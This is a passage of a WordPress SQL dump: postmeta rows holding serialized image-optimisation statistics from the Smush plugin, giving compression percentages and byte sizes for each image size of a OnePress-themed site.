;i:58859;s:10:\"size_after\";i:56179;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:4214;s:11:\"size_before\";i:96421;s:10:\"size_after\";i:92207;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:620;s:11:\"size_before\";i:11758;s:10:\"size_after\";i:11138;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:5;s:5:\"bytes\";i:1607;s:11:\"size_before\";i:32134;s:10:\"size_after\";i:30527;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2463;s:11:\"size_before\";i:52974;s:10:\"size_after\";i:50511;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4484,101,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.36053617854610564563699881546199321746826171875;s:5:\"bytes\";i:9691;s:11:\"size_before\";i:59234;s:10:\"size_after\";i:49543;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:351;s:11:\"size_before\";i:3123;s:10:\"size_after\";i:2772;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.25;s:5:\"bytes\";i:837;s:11:\"size_before\";i:6317;s:10:\"size_after\";i:5480;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4967;s:11:\"size_before\";i:21657;s:10:\"size_after\";i:16690;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:443;s:11:\"size_before\";i:4713;s:10:\"size_after\";i:4270;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1164;s:11:\"size_before\";i:9595;s:10:\"size_after\";i:8431;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1929;s:11:\"size_before\";i:13829;s:10:\"size_after\";i:11900;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4485,100,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.9383882937758176723264114116318523883819580078125;s:5:\"bytes\";i:8517;s:11:\"size_before\";i:85698;s:10:\"size_after\";i:77181;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:236;s:11:\"size_before\";i:3081;s:10:\"size_after\";i:2845;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:706;s:11:\"size_before\";i:7473;s:10:\"size_after\";i:6767;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4662;s:11:\"size_before\";i:33359;s:10:\"size_after\";i:28697;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.28000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:324;s:11:\"size_before\";i:6142;s:10:\"size_after\";i:5818;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.71999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:915;s:11:\"size_before\";i:13610;s:10:\"size_after\";i:12695;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1674;s:11:\"size_before\";i:22033;s:10:\"size_after\";i:20359;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4486,98,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:16.36053617854610564563699881546199321746826171875;s:5:\"bytes\";i:9691;s:11:\"size_before\";i:59234;s:10:\"size_after\";i:49543;s:4:\"time\";d:0.1100000000000000144328993201270350255072116851806640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:351;s:11:\"size_before\";i:3123;s:10:\"size_after\";i:2772;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.25;s:5:\"bytes\";i:837;s:11:\"size_before\";i:6317;s:10:\"size_after\";i:5480;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:4967;s:11:\"size_before\";i:21657;s:10:\"size_after\";i:16690;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:443;s:11:\"size_before\";i:4713;s:10:\"size_after\";i:4270;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1164;s:11:\"size_before\";i:9595;s:10:\"size_after\";i:8431;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.949999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1929;s:11:\"size_before\";i:13829;s:10:\"size_after\";i:11900;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4487,97,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.115873093708625418685187469236552715301513671875;s:5:\"bytes\";i:9295;s:11:\"size_before\";i:101965;s:10:\"size_after\";i:92670;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:299;s:11:\"size_before\";i:3521;s:10:\"size_after\";i:3222;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:847;s:11:\"size_before\";i:9014;s:10:\"size_after\";i:8167;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:4772;s:11:\"size_before\";i:38628;s:10:\"size_after\";i:33856;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.04000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:468;s:11:\"size_before\";i:7749;s:10:\"size_after\";i:7281;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1071;s:11:\"size_before\";i:16694;s:10:\"size_after\";i:15623;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1838;s:11:\"size_before\";i:26359;s:10:\"size_after\";i:24521;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4488,95,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.5088520845231290223864561994560062885284423828125;s:5:\"bytes\";i:7659;s:11:\"size_before\";i:80546;s:10:\"size_after\";i:72887;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.61000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:221;s:11:\"size_before\";i:3343;s:10:\"size_after\";i:3122;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.75;s:5:\"bytes\";i:681;s:11:\"size_before\";i:7779;s:10:\"size_after\";i:7098;s:4:\"time\";d:0.190000000000000002220446049250313080847263336181640625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:4210;s:11:\"size_before\";i:29525;s:10:\"size_after\";i:25315;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:295;s:11:\"size_before\";i:6426;s:10:\"size_after\";i:6131;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:847;s:11:\"size_before\";i:13350;s:10:\"size_after\";i:12503;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:1405;s:11:\"size_before\";i:20123;s:10:\"size_after\";i:18718;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4489,94,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.4286335673895482756279307068325579166412353515625;s:5:\"bytes\";i:9288;s:11:\"size_before\";i:64372;s:10:\"size_after\";i:55084;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:318;s:11:\"size_before\";i:3366;s:10:\"size_after\";i:3048;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:802;s:11:\"size_before\";i:6854;s:10:\"size_after\";i:6052;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.75;s:5:\"bytes\";i:4813;s:11:\"size_before\";i:23194;s:10:\"size_after\";i:18381;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.30999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:388;s:11:\"size_before\";i:5308;s:10:\"size_after\";i:4920;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1093;s:11:\"size_before\";i:10531;s:10:\"size_after\";i:9438;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:1874;s:11:\"size_before\";i:15119;s:10:\"size_after\";i:13245;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4490,92,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.5681136227245442427147281705401837825775146484375;s:5:\"bytes\";i:9339;s:11:\"size_before\";i:59988;s:10:\"size_after\";i:50649;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:336;s:11:\"size_before\";i:3162;s:10:\"size_after\";i:2826;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:808;s:11:\"size_before\";i:6388;s:10:\"size_after\";i:5580;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:4855;s:11:\"size_before\";i:21877;s:10:\"size_after\";i:17022;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:390;s:11:\"size_before\";i:4795;s:10:\"size_after\";i:4405;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1098;s:11:\"size_before\";i:9752;s:10:\"size_after\";i:8654;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1852;s:11:\"size_before\";i:14014;s:10:\"size_after\";i:12162;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4491,91,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.38928337613939589800793328322470188140869140625;s:5:\"bytes\";i:8252;s:11:\"size_before\";i:79428;s:10:\"size_after\";i:71176;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:299;s:11:\"size_before\";i:3271;s:10:\"size_after\";i:2972;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:784;s:11:\"size_before\";i:7553;s:10:\"size_after\";i:6769;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4387;s:11:\"size_before\";i:29415;s:10:\"size_after\";i:25028;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.78000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:366;s:11:\"size_before\";i:6331;s:10:\"size_after\";i:5965;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:895;s:11:\"size_before\";i:13074;s:10:\"size_after\";i:12179;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.69000000000000039079850466805510222911834716796875;s:5:\"bytes\";i:1521;s:11:\"size_before\";i:19784;s:10:\"size_after\";i:18263;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4492,89,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:15.5681136227245442427147281705401837825775146484375;s:5:\"bytes\";i:9339;s:11:\"size_before\";i:59988;s:10:\"size_after\";i:50649;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:336;s:11:\"size_before\";i:3162;s:10:\"size_after\";i:2826;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:808;s:11:\"size_before\";i:6388;s:10:\"size_after\";i:5580;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.190000000000001278976924368180334568023681640625;s:5:\"bytes\";i:4855;s:11:\"size_before\";i:21877;s:10:\"size_after\";i:17022;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:390;s:11:\"size_before\";i:4795;s:10:\"size_after\";i:4405;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1098;s:11:\"size_before\";i:9752;s:10:\"size_after\";i:8654;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1852;s:11:\"size_before\";i:14014;s:10:\"size_after\";i:12162;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4493,88,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.004651523373905064318023505620658397674560546875;s:5:\"bytes\";i:7743;s:11:\"size_before\";i:77394;s:10:\"size_after\";i:69651;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:234;s:11:\"size_before\";i:3303;s:10:\"size_after\";i:3069;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:687;s:11:\"size_before\";i:7487;s:10:\"size_after\";i:6800;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:4227;s:11:\"size_before\";i:28365;s:10:\"size_after\";i:24138;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:302;s:11:\"size_before\";i:6126;s:10:\"size_after\";i:5824;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:842;s:11:\"size_before\";i:12756;s:10:\"size_after\";i:11914;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5;s:5:\"bytes\";i:1451;s:11:\"size_before\";i:19357;s:10:\"size_after\";i:17906;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4494,85,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.9770012299708508152207286912016570568084716796875;s:5:\"bytes\";i:8889;s:11:\"size_before\";i:59351;s:10:\"size_after\";i:50462;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.5;s:5:\"bytes\";i:296;s:11:\"size_before\";i:3115;s:10:\"size_after\";i:2819;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:738;s:11:\"size_before\";i:6309;s:10:\"size_after\";i:5571;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:21.85000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4749;s:11:\"size_before\";i:21736;s:10:\"size_after\";i:16987;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:351;s:11:\"size_before\";i:4742;s:10:\"size_after\";i:4391;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1014;s:11:\"size_before\";i:9602;s:10:\"size_after\";i:8588;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:1741;s:11:\"size_before\";i:13847;s:10:\"size_after\";i:12106;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4495,84,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.6051681301990612382724066264927387237548828125;s:5:\"bytes\";i:8555;s:11:\"size_before\";i:99417;s:10:\"size_after\";i:90862;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:259;s:11:\"size_before\";i:3611;s:10:\"size_after\";i:3352;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:827;s:11:\"size_before\";i:9175;s:10:\"size_after\";i:8348;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:4477;s:11:\"size_before\";i:36498;s:10:\"size_after\";i:32021;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.37000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:425;s:11:\"size_before\";i:7919;s:10:\"size_after\";i:7494;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:6;s:5:\"bytes\";i:1003;s:11:\"size_before\";i:16704;s:10:\"size_after\";i:15701;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.12999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:1564;s:11:\"size_before\";i:25510;s:10:\"size_after\";i:23946;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4496,81,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.1379236071223459703105618245899677276611328125;s:5:\"bytes\";i:10105;s:11:\"size_before\";i:55712;s:10:\"size_after\";i:45607;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.5;s:5:\"bytes\";i:277;s:11:\"size_before\";i:2637;s:10:\"size_after\";i:2360;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:890;s:11:\"size_before\";i:5699;s:10:\"size_after\";i:4809;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:25.8299999999999982946974341757595539093017578125;s:5:\"bytes\";i:5264;s:11:\"size_before\";i:20381;s:10:\"size_after\";i:15117;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:422;s:11:\"size_before\";i:4916;s:10:\"size_after\";i:4494;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1207;s:11:\"size_before\";i:8975;s:10:\"size_after\";i:7768;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:2045;s:11:\"size_before\";i:13104;s:10:\"size_after\";i:11059;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4497,80,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.04333027883230755605836748145520687103271484375;s:5:\"bytes\";i:8436;s:11:\"size_before\";i:76390;s:10:\"size_after\";i:67954;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.480000000000000426325641456060111522674560546875;s:5:\"bytes\";i:244;s:11:\"size_before\";i:3764;s:10:\"size_after\";i:3520;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:725;s:11:\"size_before\";i:8778;s:10:\"size_after\";i:8053;s:4:\"time\";d:0.0100000000000000002081668171172168513294309377670288085937